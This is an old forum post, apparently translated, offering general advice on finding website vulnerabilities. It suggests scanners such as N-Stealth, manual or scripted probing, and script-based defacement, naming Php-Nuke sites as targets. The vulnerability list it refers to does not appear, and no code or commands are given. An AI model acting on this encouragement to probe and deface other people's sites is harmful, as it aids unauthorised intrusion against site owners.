Site Vulnerabilities (Might Be Useful to You)

  1. erdal
    Registered: 01/October/2005
    Male
    You can try these vulnerabilities by hand one by one, or add them to a script or program you write and scan automatically.
    The chance of these kinds of vulnerabilities turning up is 1%, but try them anyway.
    --------------------------------------------------------------------------------
    You can find these by scanning with scanner programs.
    --------------------------------------------------------------------------------
    You can look at these vulnerabilities with the N-Stealth program. But you cannot do anything to up-to-date sites with these vulnerabilities. Script defaces have become more important. Now you can learn a scripting language and force the site into making errors yourself. The best example of this is Php-Nuke sites.
    --------------------------------------------------------------------------------
Total Hits: 10115 Total Messages: 1